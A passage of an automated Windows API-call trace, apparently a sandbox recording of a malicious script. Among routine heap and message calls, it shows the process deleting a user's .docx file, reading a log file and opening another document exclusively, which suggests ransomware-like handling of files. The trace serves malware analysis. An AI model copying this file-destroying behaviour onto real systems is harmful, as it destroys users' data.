[0037.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.035] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0037.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0037.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.036] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.037] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.038] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.038] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.038] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.038] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0037.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.038] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.038] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.038] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0037.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.039] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.039] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.039] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.039] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx", lpFilePart=0x0) returned 0x36 [0037.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.039] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb456a080, ftCreationTime.dwHighDateTime=0x1d568d0, ftLastAccessTime.dwLowDateTime=0x6ef70c0, ftLastAccessTime.dwHighDateTime=0x1d5a02f, ftLastWriteTime.dwLowDateTime=0x15c804c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1550b, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="zldtrs1nh.docx", cAlternateFileName="ZLDTRS~1.DOC")) returned 0x7c2240 [0037.039] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zldtrs1nh.docx")) returned 1 [0037.041] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb456a080, ftCreationTime.dwHighDateTime=0x1d568d0, ftLastAccessTime.dwLowDateTime=0x6ef70c0, ftLastAccessTime.dwHighDateTime=0x1d5a02f, ftLastWriteTime.dwLowDateTime=0x15c804c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1550b, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="zldtrs1nh.docx", cAlternateFileName="ZLDTRS~1.DOC")) returned 0 [0037.041] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0037.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0037.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.042] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.042] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.042] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.042] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.042] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.042] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.042] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.042] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.042] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.043] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.043] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0037.043] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.043] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.043] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0037.043] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2084, lpOverlapped=0x0) returned 1 [0037.043] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0037.043] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2084, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.043] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.043] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.043] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.043] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.043] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.043] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0037.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.044] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.044] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.044] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.044] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889688 [0037.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889688, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0037.044] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_h6yz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.045] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.045] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.045] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.045] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.045] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0037.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb38 [0037.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cb38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0037.045] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.046] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 